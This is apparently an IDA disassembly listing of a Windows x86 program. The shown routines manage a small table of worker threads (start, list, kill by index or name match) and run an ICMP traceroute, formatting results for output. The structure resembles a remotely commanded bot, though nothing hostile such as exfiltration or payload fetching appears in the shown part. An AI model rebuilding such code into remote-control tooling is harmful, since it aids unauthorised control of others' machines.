cmp dword ptr [ecx+eax+8], 0
jnz short loc_409672
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, dword_41E2F8
add ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_409674
; ---------------------------------------------------------------------------
loc_409672: ; CODE XREF: sub_4095A4+AE�j
jmp short loc_409631
; ---------------------------------------------------------------------------
loc_409674: ; CODE XREF: sub_4095A4+98�j
; sub_4095A4+CC�j
cmp [ebp+var_C], 0
jnz short loc_409695
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409695: ; CODE XREF: sub_4095A4+D4�j
cmp [ebp+arg_4], 0
jz short loc_4096A3
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov [eax], ecx
loc_4096A3: ; CODE XREF: sub_4095A4+F5�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax+10h], ecx
lea eax, [ebp+arg_10]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_C]
mov eax, [ebp+var_C]
add eax, 14h
push eax
call sub_416DC6 ; vsprintf
add esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+var_C]
and dword ptr [eax+4], 0
mov eax, dword_41E2F0
inc eax
mov dword_41E2F0, eax
cmp [ebp+arg_4], 0
jz short loc_4096EB
mov eax, [ebp+arg_4]
mov [ebp+var_14], eax
jmp short loc_4096F1
; ---------------------------------------------------------------------------
loc_4096EB: ; CODE XREF: sub_4095A4+13D�j
mov eax, [ebp+var_C]
mov [ebp+var_14], eax
loc_4096F1: ; CODE XREF: sub_4095A4+145�j
mov eax, [ebp+var_C]
add eax, 0Ch
push eax
push 0
push [ebp+var_14]
push offset loc_4094E6
push 0
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov ecx, [ebp+var_C]
mov [ecx+8], eax
mov eax, [ebp+var_C]
cmp dword ptr [eax+8], 0
jnz short loc_409753
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
mov eax, dword_41E2F0
dec eax
mov dword_41E2F0, eax
push 198h
push 0
lea eax, [ebp+var_C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
jmp short locret_409761
; ---------------------------------------------------------------------------
loc_409753: ; CODE XREF: sub_4095A4+177�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
push 1
pop eax
locret_409761: ; CODE XREF: sub_4095A4+30�j
; sub_4095A4+7C�j ...
leave
retn
sub_4095A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409763 proc near ; CODE XREF: .text:004012B7�p
; .text:0040178B�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, dword_41E2F0
dec eax
mov dword_41E2F0, eax
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_4170A4 ; CloseHandle
push 198h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E2D8
call sub_409C7A
pop ecx
pop ebp
retn
sub_409763 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4097A7 proc near ; CODE XREF: sub_40A9CF+EBF�p
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
cmp [ebp+arg_0], 0
jnz short loc_4097BB
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_4097BB: ; CODE XREF: sub_4097A7+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_409825
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E2D8
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
mov dword ptr [ecx+eax+4], 1
loc_409815: ; CODE XREF: sub_4097A7+3F�j
; sub_4097A7+55�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_409825: ; CODE XREF: sub_4097A7+22�j
push [ebp+arg_0]
push offset aS_0 ; "*%s*"
push 185h
lea eax, [ebp+var_190]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, dword_41E2F0
mov [ebp+var_8], eax
and [ebp+var_194], 0
jmp short loc_40986A
; ---------------------------------------------------------------------------
loc_40985D: ; CODE XREF: sub_4097A7:loc_4098E1�j
mov eax, [ebp+var_194]
inc eax
mov [ebp+var_194], eax
loc_40986A: ; CODE XREF: sub_4097A7+B4�j
cmp [ebp+var_194], 10h
jnb short loc_4098E6
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz short loc_4098E1
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
lea eax, [ebp+var_190]
push eax
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E2F8
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_4098D9
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E2F8
mov dword ptr [ecx+eax+4], 1
loc_4098D9: ; CODE XREF: sub_4097A7+116�j
cmp [ebp+var_8], 0
jnz short loc_4098E1
jmp short loc_4098E6
; ---------------------------------------------------------------------------
loc_4098E1: ; CODE XREF: sub_4097A7+E3�j
; sub_4097A7+136�j
jmp loc_40985D
; ---------------------------------------------------------------------------
loc_4098E6: ; CODE XREF: sub_4097A7+CA�j
; sub_4097A7+138�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
locret_4098F1: ; CODE XREF: sub_4097A7+F�j
; sub_4097A7+79�j
leave
retn
sub_4097A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098F3 proc near ; CODE XREF: sub_40A9CF+F13�p
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_194 = byte ptr -194h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 19Ch
cmp [ebp+arg_0], 0
jnz short loc_409907
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_409907: ; CODE XREF: sub_4098F3+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz loc_4099B4
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E2D8
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_4099A4
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz short loc_4099A4
mov eax, dword_41E2F0
dec eax
mov dword_41E2F0, eax
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
mov eax, [ecx+eax+8]
mov [ebp+var_8], eax
push 198h
push 0
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_8]
call ds:dword_4170E0 ; TerminateThread
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
loc_4099A4: ; CODE XREF: sub_4098F3+43�j
; sub_4098F3+59�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_4099B4: ; CODE XREF: sub_4098F3+22�j
push [ebp+arg_0]
push offset aS_0 ; "*%s*"
push 185h
lea eax, [ebp+var_194]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, dword_41E2F0
mov [ebp+var_C], eax
and [ebp+var_198], 0
jmp short loc_4099F9
; ---------------------------------------------------------------------------
loc_4099EC: ; CODE XREF: sub_4098F3:loc_409AC3�j
mov eax, [ebp+var_198]
inc eax
mov [ebp+var_198], eax
loc_4099F9: ; CODE XREF: sub_4098F3+F7�j
cmp [ebp+var_198], 10h
jnb loc_409AC8
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz loc_409AC3
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
lea eax, [ebp+var_194]
push eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2F8
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_409ABB
mov eax, dword_41E2F0
dec eax
mov dword_41E2F0, eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2F8
mov eax, [ecx+eax+8]
mov [ebp+var_19C], eax
push 198h
push 0
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2F8
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_19C]
call ds:dword_4170E0 ; TerminateThread
push [ebp+var_19C]
call ds:dword_4170A4 ; CloseHandle
loc_409ABB: ; CODE XREF: sub_4098F3+161�j
cmp [ebp+var_C], 0
jnz short loc_409AC3
jmp short loc_409AC8
; ---------------------------------------------------------------------------
loc_409AC3: ; CODE XREF: sub_4098F3+12A�j
; sub_4098F3+1CC�j
jmp loc_4099EC
; ---------------------------------------------------------------------------
loc_409AC8: ; CODE XREF: sub_4098F3+10D�j
; sub_4098F3+1CE�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
locret_409AD3: ; CODE XREF: sub_4098F3+F�j
; sub_4098F3+BC�j
leave
retn
sub_4098F3 endp
; ---------------------------------------------------------------------------
loc_409AD5: ; DATA XREF: sub_409BF1+2A�o
push ebp
mov ebp, esp
sub esp, 1A8h
push 1A3h
push dword ptr [ebp+8]
lea eax, [ebp-1A8h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
cmp dword_41E2F0, 0
jz short loc_409B25
push 10h
push dword_41E2F0
push offset dword_4194EC
lea eax, [ebp-1A8h]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_409B3F
; ---------------------------------------------------------------------------
loc_409B25: ; CODE XREF: .text:00409B05�j
push offset dword_4194CC
lea eax, [ebp-1A8h]
push eax
call sub_40D53F
pop ecx
pop ecx
xor eax, eax
jmp locret_409BED
; ---------------------------------------------------------------------------
loc_409B3F: ; CODE XREF: .text:00409B23�j
push offset dword_41E2D8
call sub_409C6C
pop ecx
and byte ptr [ebp-10h], 0
and dword ptr [ebp-4], 0
jmp short loc_409B5B
; ---------------------------------------------------------------------------
loc_409B54: ; CODE XREF: .text:loc_409BDB�j
mov eax, [ebp-4]
inc eax
mov [ebp-4], eax
loc_409B5B: ; CODE XREF: .text:00409B52�j
cmp dword ptr [ebp-4], 10h
jge short loc_409BE0
mov eax, [ebp-4]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz short loc_409BDB
push offset dword_41E2D8
call sub_409C7A
pop ecx
push 3E8h
call ds:dword_41709C ; Sleep
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, [ebp-4]
imul eax, 198h
mov ecx, dword_41E2F8
lea eax, [ecx+eax+14h]
push eax
push dword ptr [ebp-4]
push offset dword_4194BC
lea eax, [ebp-1A8h]
push eax
call sub_40D53F
add esp, 10h
mov eax, [ebp-4]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+4], 0
jz short loc_409BDB
jmp short loc_409BE0
; ---------------------------------------------------------------------------
loc_409BDB: ; CODE XREF: .text:00409B75�j
; .text:00409BD7�j
jmp loc_409B54
; ---------------------------------------------------------------------------
loc_409BE0: ; CODE XREF: .text:00409B5F�j
; .text:00409BD9�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
locret_409BED: ; CODE XREF: .text:00409B3A�j
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BF1 proc near ; CODE XREF: sub_40A9CF+AFB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_409C0B
jmp short locret_409C34
; ---------------------------------------------------------------------------
loc_409C0B: ; CODE XREF: sub_409BF1+16�j
push [ebp+arg_0]
push [ebp+var_4]
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_0]
push offset loc_409AD5
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short locret_409C34
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
locret_409C34: ; CODE XREF: sub_409BF1+18�j
; sub_409BF1+38�j
leave
retn
sub_409BF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C36 proc near ; CODE XREF: sub_405FA3+9�p
; sub_40938F+1F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 18h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
cmp dword_41DE40, 0
jz short loc_409C61
push 80000400h
push [ebp+arg_0]
call dword_41DE40 ; InitializeCriticalSectionAndSpinCount
jmp short loc_409C6A
; ---------------------------------------------------------------------------
loc_409C61: ; CODE XREF: sub_409C36+19�j
push [ebp+arg_0]
call ds:dword_4170E4 ; InitializeCriticalSection
loc_409C6A: ; CODE XREF: sub_409C36+29�j
pop ebp
retn
sub_409C36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C6C proc near ; CODE XREF: sub_406041+10�p
; sub_4095A4+B�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_4170EC ; RtlEnterCriticalSection
pop ebp
retn
sub_409C6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C7A proc near ; CODE XREF: sub_406041+26�p
; sub_406041+307�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_41710C ; RtlLeaveCriticalSection
pop ebp
retn
sub_409C7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C88 proc near ; CODE XREF: .text:0040333B�p
; .text:00411928�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xadd [esi], eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C9D proc near ; CODE XREF: sub_4042FB+17�p
; sub_4042FB+25�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xchg eax, [esi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409CB1 proc near ; CODE XREF: .text:00409FD2�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 38h
call dword_41E2FC
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_409CD8
push offset aCouldNotGetAVa ; "Could not get a valid ICMP handle\n"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_409DCE
; ---------------------------------------------------------------------------
loc_409CD8: ; CODE XREF: sub_409CB1+13�j
push 8
push 0
lea eax, [ebp+var_18]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov al, [ebp+arg_8]
mov [ebp+var_18], al
movzx eax, [ebp+arg_10]
push eax
call sub_416DD2
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_C], eax
movzx eax, [ebp+arg_10]
push eax
push 45h
push [ebp+var_C]
call sub_416B6A ; memset
add esp, 0Ch
movzx eax, [ebp+arg_10]
cmp eax, 8
jge short loc_409D26
mov [ebp+var_38], 8
jmp short loc_409D2D
; ---------------------------------------------------------------------------
loc_409D26: ; CODE XREF: sub_409CB1+6A�j
movzx eax, [ebp+arg_10]
mov [ebp+var_38], eax
loc_409D2D: ; CODE XREF: sub_409CB1+73�j
mov eax, [ebp+var_38]
add eax, 1Ch
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_416DD2
pop ecx
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
push [ebp+arg_C]
push [ebp+var_24]
push [ebp+var_10]
lea eax, [ebp+var_18]
push eax
movzx ax, [ebp+arg_10]
push eax
push [ebp+var_C]
push [ebp+arg_0]
push [ebp+var_1C]
call dword_41E308
mov [ebp+var_20], eax
mov [ebp+var_8], 1
cmp [ebp+var_20], 1
jz short loc_409D8D
call ds:dword_417064 ; RtlGetLastWin32Error
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_409DA4
; ---------------------------------------------------------------------------
loc_409D8D: ; CODE XREF: sub_409CB1+CD�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov [eax+4], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov ecx, [ecx+8]
mov [eax+8], ecx
loc_409DA4: ; CODE XREF: sub_409CB1+DA�j
push [ebp+var_1C]
call dword_41E304
mov eax, [ebp+var_C]
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_416DCC
pop ecx
mov eax, [ebp+var_10]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_416DCC
pop ecx
mov eax, [ebp+var_8]
locret_409DCE: ; CODE XREF: sub_409CB1+22�j
leave
retn
sub_409CB1 endp
; ---------------------------------------------------------------------------
loc_409DD0: ; DATA XREF: sub_40A1A7+FD�o
push ebp
mov ebp, esp
sub esp, 2F0h
push 2ACh
push dword ptr [ebp+8]
lea eax, [ebp-2B0h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
movzx eax, byte_41E310
test eax, eax
jnz short loc_409E6D
push offset aIcmp_dll ; "ICMP.DLL"
call ds:dword_417054 ; LoadLibraryA
mov dword_41E300, eax
cmp dword_41E300, 0
jnz short loc_409E24
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E24: ; CODE XREF: .text:00409E1B�j
push offset aIcmpcreatefile ; "IcmpCreateFile"
push dword_41E300
call ds:dword_417058 ; GetProcAddress
mov dword_41E2FC, eax
push offset aIcmpsendecho ; "IcmpSendEcho"
push dword_41E300
call ds:dword_417058 ; GetProcAddress
mov dword_41E308, eax
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push dword_41E300
call ds:dword_417058 ; GetProcAddress
mov dword_41E304, eax
mov byte_41E310, 1
loc_409E6D: ; CODE XREF: .text:00409E02�j
cmp dword_41E2FC, 0
jnz short loc_409E7D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E7D: ; CODE XREF: .text:00409E74�j
cmp dword_41E308, 0
jnz short loc_409E8D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E8D: ; CODE XREF: .text:00409E84�j
cmp dword_41E304, 0
jnz short loc_409E9D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E9D: ; CODE XREF: .text:00409E94�j
lea eax, [ebp-10Dh]
mov [ebp-2B8h], eax
push dword ptr [ebp-2B8h]
call ds:dword_417244 ; inet_addr
mov [ebp-2BCh], eax
cmp dword ptr [ebp-2BCh], 0FFFFFFFFh
jnz short loc_409F18
push dword ptr [ebp-2B8h]
call ds:dword_41723C ; gethostbyname
mov [ebp-2C0h], eax
cmp dword ptr [ebp-2C0h], 0
jz short loc_409F06
mov eax, [ebp-2C0h]
movsx eax, word ptr [eax+0Ah]
push eax
mov eax, [ebp-2C0h]
mov eax, [eax+0Ch]
push dword ptr [eax]
lea eax, [ebp-2BCh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_409F18
; ---------------------------------------------------------------------------
loc_409F06: ; CODE XREF: .text:00409EDD�j
push offset aCouldNotResolv ; "Could not resolve name"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409F18: ; CODE XREF: .text:00409EC2�j
; .text:00409F04�j
and dword ptr [ebp-4], 0
mov byte ptr [ebp-2B4h], 1
jmp short loc_409F33
; ---------------------------------------------------------------------------
loc_409F25: ; CODE XREF: .text:loc_40A19C�j
mov al, [ebp-2B4h]
add al, 1
mov [ebp-2B4h], al
loc_409F33: ; CODE XREF: .text:00409F23�j
movzx eax, byte ptr [ebp-2B4h]
movzx ecx, byte ptr [ebp-0Dh]
cmp eax, ecx
jg loc_40A1A1
cmp dword ptr [ebp-4], 0
jnz loc_40A1A1
and dword ptr [ebp-2ECh], 0
or dword ptr [ebp-2E4h], 0FFFFFFFFh
and dword ptr [ebp-2E0h], 0
and dword ptr [ebp-2DCh], 0
and dword ptr [ebp-2D0h], 0
and dword ptr [ebp-2C8h], 0
and dword ptr [ebp-2CCh], 0
and dword ptr [ebp-2D8h], 0
and dword ptr [ebp-2D4h], 0
jmp short loc_409F9E
; ---------------------------------------------------------------------------
loc_409F91: ; CODE XREF: .text:loc_40A04E�j
mov eax, [ebp-2D4h]
inc eax
mov [ebp-2D4h], eax
loc_409F9E: ; CODE XREF: .text:00409F8F�j
mov eax, [ebp-2D4h]
cmp eax, [ebp-8]
jnb loc_40A053
cmp dword ptr [ebp-2D8h], 0
jnz loc_40A053
push 20h
push dword ptr [ebp-0Ch]
push dword ptr [ebp-2B4h]
lea eax, [ebp-2CCh]
push eax
push dword ptr [ebp-2BCh]
call sub_409CB1
add esp, 14h
test eax, eax
jz short loc_40A047
cmp dword ptr [ebp-2CCh], 0
jnz short loc_40A02F
mov eax, [ebp-2D0h]
add eax, [ebp-2C4h]
mov [ebp-2D0h], eax
mov eax, [ebp-2C4h]
cmp eax, [ebp-2E4h]
jnb short loc_40A013
mov eax, [ebp-2C4h]
mov [ebp-2E4h], eax
loc_40A013: ; CODE XREF: .text:0040A005�j
mov eax, [ebp-2C4h]
cmp eax, [ebp-2DCh]
jbe short loc_40A02D
mov eax, [ebp-2C4h]
mov [ebp-2DCh], eax
loc_40A02D: ; CODE XREF: .text:0040A01F�j
jmp short loc_40A045
; ---------------------------------------------------------------------------
loc_40A02F: ; CODE XREF: .text:00409FE5�j
mov eax, [ebp-2CCh]
mov [ebp-2ECh], eax
mov dword ptr [ebp-2D8h], 1
loc_40A045: ; CODE XREF: .text:loc_40A02D�j
jmp short loc_40A04E
; ---------------------------------------------------------------------------
loc_40A047: ; CODE XREF: .text:00409FDC�j
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_40A04E: ; CODE XREF: .text:loc_40A045�j
jmp loc_409F91
; ---------------------------------------------------------------------------
loc_40A053: ; CODE XREF: .text:00409FA7�j
; .text:00409FB4�j
mov eax, [ebp-2C8h]
mov [ebp-2E8h], eax
cmp dword ptr [ebp-2ECh], 0
jnz short loc_40A07B
mov eax, [ebp-2D0h]
xor edx, edx
div dword ptr [ebp-8]
mov [ebp-2E0h], eax
jmp short loc_40A090
; ---------------------------------------------------------------------------
loc_40A07B: ; CODE XREF: .text:0040A066�j
and dword ptr [ebp-2E4h], 0
and dword ptr [ebp-2E0h], 0
and dword ptr [ebp-2DCh], 0
loc_40A090: ; CODE XREF: .text:0040A079�j
cmp dword ptr [ebp-2ECh], 0
jnz loc_40A165
push 2
push 4
lea eax, [ebp-2E8h]
push eax
call ds:dword_417220 ; gethostbyaddr
mov [ebp-2F0h], eax
cmp dword ptr [ebp-2F0h], 0
jz short loc_40A115
movzx eax, byte ptr [ebp-2E5h]
push eax
movzx eax, byte ptr [ebp-2E6h]
push eax
movzx eax, byte ptr [ebp-2E7h]
push eax
movzx eax, byte ptr [ebp-2E8h]
push eax
mov eax, [ebp-2F0h]
push dword ptr [eax]
push dword ptr [ebp-2DCh]
push dword ptr [ebp-2E0h]
push dword ptr [ebp-2E4h]
movzx eax, byte ptr [ebp-2B4h]
push eax
push offset dword_419594
lea eax, [ebp-2B0h]
push eax
call sub_40D53F
add esp, 2Ch
jmp short loc_40A163
; ---------------------------------------------------------------------------
loc_40A115: ; CODE XREF: .text:0040A0BB�j
movzx eax, byte ptr [ebp-2E5h]
push eax
movzx eax, byte ptr [ebp-2E6h]
push eax
movzx eax, byte ptr [ebp-2E7h]
push eax
movzx eax, byte ptr [ebp-2E8h]
push eax
push dword ptr [ebp-2DCh]
push dword ptr [ebp-2E0h]
push dword ptr [ebp-2E4h]
movzx eax, byte ptr [ebp-2B4h]
push eax
push offset dword_419568
lea eax, [ebp-2B0h]
push eax
call sub_40D53F
add esp, 28h
loc_40A163: ; CODE XREF: .text:0040A113�j
jmp short loc_40A187
; ---------------------------------------------------------------------------
loc_40A165: ; CODE XREF: .text:0040A097�j
push dword ptr [ebp-2ECh]
movzx eax, byte ptr [ebp-2B4h]
push eax
push offset dword_419540
lea eax, [ebp-2B0h]
push eax
call sub_40D53F
add esp, 10h
loc_40A187: ; CODE XREF: .text:loc_40A163�j
mov eax, [ebp-2BCh]
cmp eax, [ebp-2E8h]
jnz short loc_40A19C
mov dword ptr [ebp-4], 1
loc_40A19C: ; CODE XREF: .text:0040A193�j
jmp loc_409F25
; ---------------------------------------------------------------------------
loc_40A1A1: ; CODE XREF: .text:00409F40�j
; .text:00409F4A�j
xor eax, eax
locret_40A1A3: ; CODE XREF: .text:00409E1F�j
; .text:00409E78�j ...
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A1A7 proc near ; CODE XREF: sub_40A9CF+FAE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
cmp [ebp+arg_4], 0
jnz short loc_40A1C7
push offset unk_419618
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1C7: ; CODE XREF: sub_40A1A7+A�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A1E0
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1E0: ; CODE XREF: sub_40A1A7+32�j
push 1A3h
push [ebp+arg_0]
push [ebp+var_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A3h
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
cmp eax, 0FFh
jg short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_40A231
; ---------------------------------------------------------------------------
loc_40A22A: ; CODE XREF: sub_40A1A7+63�j
; sub_40A1A7+73�j
mov [ebp+var_10], 1Eh
loc_40A231: ; CODE XREF: sub_40A1A7+81�j
mov eax, [ebp+var_4]
mov cl, byte ptr [ebp+var_10]
mov [eax+2A3h], cl
cmp [ebp+arg_C], 0
jz short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
cmp eax, 927C0h
jg short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
jmp short loc_40A268
; ---------------------------------------------------------------------------
loc_40A261: ; CODE XREF: sub_40A1A7+9A�j
; sub_40A1A7+AA�j
mov [ebp+var_14], 7530h
loc_40A268: ; CODE XREF: sub_40A1A7+B8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_14]
mov [eax+2A4h], ecx
cmp [ebp+arg_10], 0
jz short loc_40A288
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_18], eax
jmp short loc_40A28F
; ---------------------------------------------------------------------------
loc_40A288: ; CODE XREF: sub_40A1A7+D1�j
mov [ebp+var_18], 3
loc_40A28F: ; CODE XREF: sub_40A1A7+DF�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_18]
mov [eax+2A8h], ecx
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_4]
push offset loc_409DD0
push 0
push 0
